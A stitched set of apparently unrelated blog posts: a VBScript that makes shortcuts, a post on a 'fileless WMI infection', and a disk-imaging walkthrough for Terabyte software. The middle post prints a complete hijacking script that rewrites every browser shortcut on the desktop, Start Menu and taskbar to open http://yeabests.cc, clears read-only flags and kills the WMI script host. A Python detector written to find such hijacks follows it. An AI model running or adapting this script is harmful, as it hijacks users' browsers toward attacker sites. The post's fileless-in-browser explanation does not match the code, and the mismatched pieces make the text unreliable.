Write a complicated VBscript to create a link

First, create a small text file named mkshortcut.vbs. Use your favorite text editor to edit the file; even Notepad will do. Then copy the following text and paste it into the file:

' Create a .lnk file from two named command-line arguments: /target and /shortcut
set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut(Wscript.Arguments.Named("shortcut") & ".lnk")
oShellLink.TargetPath = Wscript.Arguments.Named("target")
oShellLink.WindowStyle = 1   ' 1 = normal window
oShellLink.Save              ' nothing is written to disk until Save is called

Then save the file and exit the editor. Make sure that you move the file into a directory in your PATH (usually C:\WINDOWS\System32 is fine). Now, from the command line, you can create shortcuts this way:

mkshortcut /target:TargetName /shortcut:c:\users\<you>\desktop\ShortcutName

You will have to replace TargetName with the name of the target file and ShortcutName with the name of the shortcut to be created (do not include a .lnk extension!). For example:

C:\>mkshortcut /target:"c:/documents and settings/<you>/desktop" /shortcut:"My Desktop"


Fileless infection using wmi

Ok that sounds all sorts of wrong or confusing.

“Windows Management Instrumentation (WMI) is the Microsoft implementation of Web-Based Enterprise Management (WBEM), which is an industry initiative to develop a standard technology for accessing management information in an enterprise environment.” Credit

Still sounds a little like WTFunction?

Well, think of WMI as a database for objects within Windows.

Ok now we are done with that.

CODE in a VB script for infection (run in browser)

' Sample lifted from the source article; the comments are added here to explain what each part does.
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = "http://yeabests.cc"   ' the site that gets forced onto every browser shortcut
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers       ' lower-cased lookup table of browser executable names
	BrowserDic.Add LCase(browser), browser
Next
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
' Every place a user is likely to click a shortcut: desktops, Start Menu, Startup, Quick Launch and pinned items
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\User\Desktop"
FoldersDic(5) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\User\AppData\Roaming\Roaming"
FoldersDic(9) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)    ' walk every .lnk file in those folders
	For Each file In fso.GetFolder(FoldersDic(i)).Files
		If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
			set oShellLink = WshShell.CreateShortcut(file.Path)
			path = oShellLink.TargetPath
			name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
			If BrowserDic.Exists(LCase(name)) Then   ' the shortcut points at a browser
				oShellLink.Arguments = link          ' the URL becomes the browser's launch argument
				If file.Attributes And 1 Then        ' clear the read-only attribute so the .lnk can be rewritten
					file.Attributes = file.Attributes - 1
				End If
			End If
		End If
	Next
Next
' scrcons.exe is the WMI Standard Event Consumer host that runs WMI-stored scripts; the sample kills it when it is done
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

So what the heck? That is great code, but how does this work, and why?

You visit a website that has been compromised. It hosts a tiny JScript or VBScript that runs in your browser.

The code lifted from the source article appends an extra web site to the arguments of every browser shortcut it finds, so opening the shortcut takes you to that site because the shortcut is being told to.

To start WBEMTest, you need to run it with administrator privileges. To do this, right-click the C:\Windows\System32\wbemtest.exe executable and select Run as Administrator. WBEMTest will now start.

This will help you to evaluate a WMI infection that is spreading to your shortcuts.

This is nothing new, but it looks like it's the next wave of spyware/hijackers to be concerned with.
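As an added example (not code from this post or from the source article it quotes), here is a small Python parser for the Windows Shell Link (.lnk) format, used the defender's way round: instead of rewriting shortcuts, it reads them and flags any browser shortcut whose command-line arguments carry a URL, which is exactly what the script above plants. It also lets you inspect what the mkshortcut.vbs script from the first post actually wrote. The layout follows the published MS-SHLLINK structure (fixed 76-byte header, optional IDList, LinkInfo with a LocalBasePath, then the StringData fields). The browser list and the injected URL are taken from the page; the sample .lnk files are constructed in the block as test fixtures, and `scan_folder` is a hypothetical helper that you would point at the Desktop and Start Menu paths listed in the sample.

```python
"""Parse .lnk files offline and flag browser shortcuts with a URL in their arguments."""
import re
import struct
from pathlib import Path

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# Browser executables from the sample above, lower-cased for comparison
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "360chrome.exe", "360se.exe",
            "sogouexplorer.exe", "opera.exe", "safari.exe", "maxthon.exe", "ttraveler.exe",
            "theworld.exe", "baidubrowser.exe", "liebao.exe", "qqbrowser.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_lnk(data):
    """Return the target path and the StringData fields of a .lnk blob."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # end of the fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the IDList: 2-byte size followed by the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = ""
    if flags & HAS_LINK_INFO:
        info_size, _hdr_size, info_flags = struct.unpack_from("<III", data, pos)
        if info_flags & 0x1:  # VolumeIDAndLocalBasePath: NUL-terminated ANSI path at LocalBasePathOffset
            start = pos + struct.unpack_from("<I", data, pos + 16)[0]
            target = data[start:data.index(b"\x00", start)].decode("cp1252")
        pos += info_size

    def read_string():  # CountCharacters (2 bytes) followed by the characters, no terminator
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    fields = {"target": target}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        fields[key] = read_string() if flags & flag else ""
    return fields


def find_hijack(fields):
    """Return the URL smuggled into a browser shortcut's arguments, or None if it looks clean."""
    target = fields["target"] or fields["relative_path"]
    exe = target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in BROWSERS:
        return None
    match = URL_RE.search(fields["arguments"])
    return match.group(0) if match else None


def scan_folder(folder):
    """Hypothetical helper: check every *.lnk in a folder and map each hijacked one to its URL."""
    hits = {}
    for lnk in Path(folder).glob("*.lnk"):
        try:
            url = find_hijack(parse_lnk(lnk.read_bytes()))
        except ValueError:
            continue
        if url:
            hits[str(lnk)] = url
    return hits


def build_sample_lnk(target_path, arguments):
    """Constructed test fixture (not a real shortcut): minimal .lnk with LinkInfo and optional arguments."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)          # ShowCommand 1 = SW_SHOWNORMAL
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # fixed drive, empty label
    base = target_path.encode("cp1252") + b"\x00"
    vol_off = hdr = 0x1C
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, hdr, 0x1, vol_off, base_off, 0,
                            suffix_off) + volume_id + base + b"\x00"
    string_data = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le") if arguments else b""
    return header + link_info + string_data + struct.pack("<I", 0)  # TerminalBlock ends ExtraData


# Constructed sample values; the URL is the one the sample above injects
SAMPLE_BROWSER = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_URL = "http://yeabests.cc"


def demo():
    """Parse one hijacked and one clean browser shortcut and return what the check reports."""
    hijacked = parse_lnk(build_sample_lnk(SAMPLE_BROWSER, SAMPLE_URL))
    clean = parse_lnk(build_sample_lnk(SAMPLE_BROWSER, ""))
    return find_hijack(hijacked), find_hijack(clean)


if __name__ == "__main__":
    print(demo())  # ('http://yeabests.cc', None)
```

Point `scan_folder` at the Desktop, Start Menu, Startup and Quick Launch folders from the sample; a browser shortcut that carries a URL argument there is the footprint this hijack leaves, and the fix is to clear the Arguments field (or recreate the shortcut) and then look in WMI for the event consumer that keeps re-planting it.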


Terabyte scripting for auto install

Been using Terabyte backup software for a few years. Thought I would share a how-to on the subject.

This is for installing from a .tbi file created when a machine has had the OS captured. Think ghosting but with a different name.

IMAGE.EXE /r /clr /t /x /log:0 /bgp /ubi /d:1 /f:"u0@0x0:\YourBackup.tbi"

Use Magic ISO to create the bootable ISO from the .tbi files.

Use the Terabyte 2.66 backup disk.

Use an external drive to back up the data and move the .tbi files that were created.
Terabyte 2.66 Backup Disk:
On the Dell, hit the F12 key at boot and boot from the CD/DVD-ROM.
Once Image for DOS 2.66 loads, select Backup and click Next.
Select Full Backup.
Select BIOS (Backup From) 'Enter'
*Since you will have an external drive connected, you will have 2 options for Hard Drive selection.
Select Hard Drive 0 'Enter'
Select MIB Entire Drive and press the space bar so that this drive is selected. 'Enter'
Select Single File Set (Backup) 'Enter'
Select File (Direct) 'Enter'
Select BIOS (Backup From) 'Enter'
Select Hard Drive 1 (Backup To) 'Enter'
Select the partition on the second drive you want to back up to. 'Enter'
In Name put the <name of software><version><Machine model>, example: MyLameDesktop

Select (Omit Page File Data), (Omit Hibernation Data), De-Select (Log Results to File)
Tab over to File Size and select (2 GiB) 'Enter'
'Enter' to begin the process.
Once done, reboot the PC.

Take the external drive and move it over to the machine you will be building the burnable ISO on. (*Do a MEMSTAT check on the PC before doing this.)

Install Magic ISO (make sure you have a valid license; otherwise you will not be able to build an ISO over 600 MB).
Use the Floppy Boot Image.bif as your boot image.
*You will need to edit the TBOS.STR file to reflect the correct files.
IMAGE.EXE /r /clr /t /x /ubi /d:0 /f:"o0:\MyLameServer.tbi" <- Change MyLameServer.tbi to the correct <name of software><version><Machine model>, example: MyLameServer.tbi

To edit the file you will need to open Magic ISO, open the "Floppy Boot Image.bif" file and copy the TBOS.STR file to your desktop to edit the string (as seen above).
Once it is edited, you can drag and drop the TBOS.STR onto the Magic ISO application and overwrite the current file. Make sure to select Save.

Once this is complete, open a new file, click on Create a bootable ISO, choose the "Floppy Boot Image.bif" and click OK.

Magic ISO will reflect that the current project is now bootable.
Now drag and drop your TBI files from the hard drive (make sure they are the correctly named and numbered files).
Once this is done, click on File and scroll down to Save As.
Save as: the <name of software><version><Machine model>, example: MyLameServer.ISO

Now to burn the disc.
Put in a dual-layer DVD and use Windows Disc Image Burner.
Right-click on the ISO file and scroll down to Open with: Windows Disc Image Burner.

Choose the correct DVD burner and click Burn.

This may take 45 to 60 minutes.
Once this is completed, take the disc, being careful not to touch the written side, and place it in the PC you are going to image.

On the Dell, hit the F12 key at boot and boot from the CD/DVD-ROM.
Once it boots, it will ask you which drive to restore to.
Select Hard Drive 0 'Enter'
Allow the image to decompress and image the hard drive. This may take up to 90 minutes.
